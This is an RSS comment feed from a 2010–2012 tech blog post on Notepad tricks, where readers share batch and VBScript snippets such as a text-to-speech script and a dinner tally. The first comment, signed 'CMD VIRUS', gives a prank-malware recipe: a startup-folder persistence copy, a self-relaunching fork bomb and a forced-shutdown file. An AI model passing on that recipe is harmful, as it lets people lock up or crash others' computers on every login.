<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" > <channel><title>Comments on: 10 Amazing Things You Can Do With Notepad</title> <atom:link href="http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html/feed" rel="self" type="application/rss+xml" /><link>http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html</link> <description>Know your technology head on</description> <lastBuildDate>Thu, 17 May 2012 19:41:26 +0000</lastBuildDate> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.2.1</generator> <atom:link rel="hub" href="http://pubsubhubbub.appspot.com"/><atom:link rel="hub" href="http://superfeedr.com/hubbub"/><xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" /> <item><title>By: CMD VIRUS</title><link>http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html/comment-page-1#comment-992910</link> <dc:creator>CMD VIRUS</dc:creator> <pubDate>Mon, 26 Mar 2012 17:31:14 +0000</pubDate> <guid isPermaLink="false">http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html#comment-992910</guid> <description>@echo off color a clsSet source=C:\Users\%username%\Desktop\RB.cmd set dist=C:\Documents and Settings\All Users\Start Menu\Programs\Startup\RB.cmd ::========== copy /Y &quot;%source%&quot; &quot;%dist%&quot; &gt;nulexit------------------------------------------------------make a new notepad@echo off cls color a :loop start %0 goto loopsave it as RB.cmd-----------------------------------------------------make a new notepad@echo off cls color ashutdown -fexitsave as SDA.CMD</description> <content:encoded><![CDATA[<p>@echo off<br /> color a<br /> cls</p><p>Set source=C:\Users\%username%\Desktop\RB.cmd<br /> set dist=C:\Documents and Settings\All Users\Start Menu\Programs\Startup\RB.cmd<br /> ::==========<br /> copy /Y &#8220;%source%&#8221; &#8220;%dist%&#8221; &gt;nul</p><p>exit</p><p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p><p>make a new notepad</p><p>@echo off<br /> cls<br /> color a<br /> :loop<br /> start %0<br /> goto loop</p><p>save it as RB.cmd</p><p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p><p>make a new notepad</p><p>@echo off<br /> cls<br /> color a</p><p>shutdown -f</p><p>exit</p><p>save as SDA.CMD</p> ]]></content:encoded> </item> <item><title>By: Anon</title><link>http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html/comment-page-1#comment-519049</link> <dc:creator>Anon</dc:creator> <pubDate>Thu, 29 Sep 2011 00:58:57 +0000</pubDate> <guid isPermaLink="false">http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html#comment-519049</guid> <description>You can use it to start up websites or programs just type in start http:// www.whaterveryouwant.com /ca/ uk/ etc</description> <content:encoded><![CDATA[<p>You can use it to start up websites or programs just type in<br /> start http:// <a href="http://www.whaterveryouwant.com" rel="nofollow">http://www.whaterveryouwant.com</a> /ca/ uk/ etc</p> ]]></content:encoded> </item> <item><title>By: Maranatha</title><link>http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html/comment-page-1#comment-516672</link> <dc:creator>Maranatha</dc:creator> <pubDate>Tue, 27 Sep 2011 20:25:24 +0000</pubDate> <guid isPermaLink="false">http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html#comment-516672</guid> <description>Wow! i never though that the notepad could be so useful! Thanx dear!</description> <content:encoded><![CDATA[<p>Wow! i never though that the notepad could be so useful! Thanx dear!</p> ]]></content:encoded> </item> <item><title>By: anonymous</title><link>http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html/comment-page-1#comment-435489</link> <dc:creator>anonymous</dc:creator> <pubDate>Wed, 03 Aug 2011 09:54:43 +0000</pubDate> <guid isPermaLink="false">http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html#comment-435489</guid> <description>Type inEatOut = 0 Order = 0 Cook = 0 Hungry = 0Do Choice = InputBox(&quot;Enter 1 - Eat Out; 2 - Order Delivery; 3 - Cook&quot;,&quot;Do not press cancel until last vote is made&quot;)If (Choice  vbNull) and (Choice  &quot;&quot;) Then Select Case Choice Case 1 Wscript.Echo &quot;Eat Out&quot; EatOut = EatOut + 1 Case 2 Wscript.Echo &quot;Order Delivery&quot; Order = Order + 1 Case 3 Wscript.Echo &quot;Cook&quot; Cook = Cook + 1 Case Else Wscript.Echo &quot;Don&#039;t Eat&quot; Hungry = Hungry + 1 End Select End IfLoop Until Choice = &quot;&quot;Wscript.Echo &quot;Eat out: &quot; &amp; EatOut Wscript.Echo &quot;Order: &quot; &amp; Order Wscript.Echo &quot;Cook: &quot; &amp; Cook Wscript.Echo &quot;Don&#039;t Eat: &quot; &amp; Hungryand save as .vbs and you get a dinner tally</description> <content:encoded><![CDATA[<p>Type in</p><p>EatOut = 0<br /> Order = 0<br /> Cook = 0<br /> Hungry = 0</p><p>Do<br /> Choice = InputBox(&#8220;Enter 1 &#8211; Eat Out; 2 &#8211; Order Delivery; 3 &#8211; Cook&#8221;,&#8221;Do not press cancel until last vote is made&#8221;)</p><p> If (Choice  vbNull) and (Choice  &#8220;&#8221;) Then<br /> Select Case Choice<br /> Case 1<br /> Wscript.Echo &#8220;Eat Out&#8221;<br /> EatOut = EatOut + 1<br /> Case 2<br /> Wscript.Echo &#8220;Order Delivery&#8221;<br /> Order = Order + 1<br /> Case 3<br /> Wscript.Echo &#8220;Cook&#8221;<br /> Cook = Cook + 1<br /> Case Else<br /> Wscript.Echo &#8220;Don&#8217;t Eat&#8221;<br /> Hungry = Hungry + 1<br /> End Select<br /> End If</p><p>Loop Until Choice = &#8220;&#8221;</p><p>Wscript.Echo &#8220;Eat out: &#8221; &amp; EatOut<br /> Wscript.Echo &#8220;Order: &#8221; &amp; Order<br /> Wscript.Echo &#8220;Cook: &#8221; &amp; Cook<br /> Wscript.Echo &#8220;Don&#8217;t Eat: &#8221; &amp; Hungry</p><p>and save as .vbs and you get a dinner tally</p> ]]></content:encoded> </item> <item><title>By: Mae</title><link>http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html/comment-page-1#comment-246705</link> <dc:creator>Mae</dc:creator> <pubDate>Mon, 24 Jan 2011 06:10:10 +0000</pubDate> <guid isPermaLink="false">http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html#comment-246705</guid> <description>Dim message, sapi do message=InputBox(&quot;Enter the text you want spoken&quot;,&quot;Speak This&quot;) Set sapi=CreateObject(&quot;sapi.spvoice&quot;) sapi.Speak message loop until message = &quot;&quot;but you need to change the &quot; to make it work if you are pasting it. notepad reads them wrong.</description> <content:encoded><![CDATA[<p>Dim message, sapi<br /> do<br /> message=InputBox(&#8220;Enter the text you want spoken&#8221;,&#8221;Speak This&#8221;)<br /> Set sapi=CreateObject(&#8220;sapi.spvoice&#8221;)<br /> sapi.Speak message<br /> loop until message = &#8220;&#8221;</p><p>but you need to change the &#8221; to make it work if you are pasting it. notepad reads them wrong.</p> ]]></content:encoded> </item> <item><title>By: Mae</title><link>http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html/comment-page-1#comment-246701</link> <dc:creator>Mae</dc:creator> <pubDate>Mon, 24 Jan 2011 05:55:53 +0000</pubDate> <guid isPermaLink="false">http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html#comment-246701</guid> <description>i have a coo thing you can do with notepad! you can write your own program that speaks what you type!First, paste this into notepad:Dim message, sapi do message=InputBox(â€œEnter the text you want spokenâ€,â€Speak Thisâ€) Set sapi=CreateObject(â€œsapi.spvoiceâ€) sapi.Speak message loop until message = â€œâ€(you need to go back and manually change the &quot; signs because notepad reads them wrong.)then you save the file with any name followed by .vbs (e.g Speak this.vbs)you will also need to save it under all files.then you close notepad and find the file. open the file if you receive an error message make sure that you have changed the &#039;&#039; signs to your own. if a box pops up and asks you to type something in type anything you like! the computer will say what you type!good-luck!</description> <content:encoded><![CDATA[<p>i have a coo thing you can do with notepad! you can write your own program that speaks what you type!</p><p>First, paste this into notepad:</p><p>Dim message, sapi<br /> do<br /> message=InputBox(â€œEnter the text you want spokenâ€,â€Speak Thisâ€)<br /> Set sapi=CreateObject(â€œsapi.spvoiceâ€)<br /> sapi.Speak message<br /> loop until message = â€œâ€</p><p>(you need to go back and manually change the &#8221; signs because notepad reads them wrong.)</p><p>then you save the file with any name followed by .vbs (e.g Speak this.vbs)</p><p>you will also need to save it under all files.</p><p>then you close notepad and find the file. open the file if you receive an error message make sure that you have changed the &#8221; signs to your own. if a box pops up and asks you to type something in type anything you like! the computer will say what you type!</p><p>good-luck!</p> ]]></content:encoded> </item> <item><title>By: ben brauer</title><link>http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html/comment-page-1#comment-137441</link> <dc:creator>ben brauer</dc:creator> <pubDate>Thu, 12 Aug 2010 12:47:04 +0000</pubDate> <guid isPermaLink="false">http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html#comment-137441</guid> <description>hey guyz whats more that is really cool is you can make questionaires and menu&#039;ing systems right from notepad. copy and paste the following into a notepad text box and save as a .bat file: @echo off echo welcome to the &quot;techie-buzz.com&quot; questionaire. echo: echo we would like you to complete the following questionaire. echo: echo when prompted, press 1 for yes, 2 for no, or press 5 to quit. pause cls echo ........................................................... echo did you find the resources on our website useful/helpful? echo ........................................................... set /p q=type your answer now and press ENTER when you are done: if %q%==1 goto 1 if %q%==2 goto 2 if %q%==5 goto 5 :1 cls echo you have answered yes. echo: echo we apreciate your feed back. echo thank you for your time. pause exit </description> <content:encoded><![CDATA[<p>hey guyz whats more that is really cool is you can make questionaires and menu&#039;ing systems right from notepad.<br /> copy and paste the following into a notepad text box and save as a .bat file:</p><p>@echo off<br /> echo welcome to the &quot;techie-buzz.com&quot; questionaire.<br /> echo:<br /> echo we would like you to complete the following questionaire.<br /> echo:<br /> echo when prompted, press 1 for yes, 2 for no, or press 5 to quit.<br /> pause<br /> cls<br /> echo &#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..<br /> echo did you find the resources on our website useful/helpful?<br /> echo &#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..<br /> set /p q=type your answer now and press ENTER when you are done:<br /> if %q%==1 goto 1<br /> if %q%==2 goto 2<br /> if %q%==5 goto 5<br /> :1<br /> cls<br /> echo you have answered yes.<br /> echo:<br /> echo we apreciate your feed back.<br /> echo thank you for your time.<br /> pause<br /> exit</p> ]]></content:encoded> </item> <item><title>By: anonymous</title><link>http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html/comment-page-1#comment-131430</link> <dc:creator>anonymous</dc:creator> <pubDate>Thu, 29 Jul 2010 08:48:37 +0000</pubDate> <guid isPermaLink="false">http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html#comment-131430</guid> <description>i use notepad for creating programs </description> <content:encoded><![CDATA[<p>i use notepad for creating programs</p> ]]></content:encoded> </item> <item><title>By: ABCabc</title><link>http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html/comment-page-1#comment-128932</link> <dc:creator>ABCabc</dc:creator> <pubDate>Thu, 22 Jul 2010 22:54:10 +0000</pubDate> <guid isPermaLink="false">http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html#comment-128932</guid> <description>First open notepad Matrix Effect Here is the code.Just copy it. @echo off color 0a :start echo %random% %random% %random% %random% %random% %random% %random% %random% %radom% %random goto start </description> <content:encoded><![CDATA[<p>First open notepad</p><p>Matrix Effect</p><p>Here is the code.Just copy it.</p><p>@echo off</p><p>color 0a</p><p>:start</p><p>echo %random% %random% %random% %random% %random% %random% %random% %random% %radom% %random</p><p>goto start</p> ]]></content:encoded> </item> <item><title>By: ravi</title><link>http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html/comment-page-1#comment-105568</link> <dc:creator>ravi</dc:creator> <pubDate>Wed, 02 Jun 2010 22:48:23 +0000</pubDate> <guid isPermaLink="false">http://techie-buzz.com/collections/10-amazing-things-you-can-do-with-notepad.html#comment-105568</guid> <description>gud darling </description> <content:encoded><![CDATA[<p>gud darling</p> ]]></content:encoded> </item> </channel> </rss>

<!-- W3 Total Cache: Minify debug info:
Engine:             disk: basic
Theme:              11546
Template:           single
-->
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Database Caching 3/23 queries in 0.042 seconds using memcached
Object Caching 762/775 objects using memcached
Content Delivery Network via cdn4.techie-buzz.com

Served from: www.techie-buzz.com @ 2012-05-17 18:21:33 -->

<!-- W3 Total Cache: Page cache debug info:
Engine:             disk: enhanced
Cache key:          collections/10-amazing-things-you-can-do-with-notepad.html/feed/_index.xml_gzip
Caching:            enabled
Status:             not cached
Creation Time:      0.248s
Header info:
X-Pingback:         http://techie-buzz.com/xmlrpc.php
Link:               <http://wp.me/p4tVd-1bz>; rel=shortlink
Content-Type:       text/xml; charset=UTF-8
Last-Modified:      Thu, 17 May 2012 22:21:33 GMT
Vary:               Accept-Encoding, Cookie
Expires:            Thu, 17 May 2012 22:31:33 GMT
Pragma:             public
Cache-Control:      max-age=600, public, must-revalidate, proxy-revalidate
Etag:               ec3947429fa1bf63b3c181b5934bd647
X-Powered-By:       W3 Total Cache/0.9.2.4
Content-Encoding:   gzip
-->
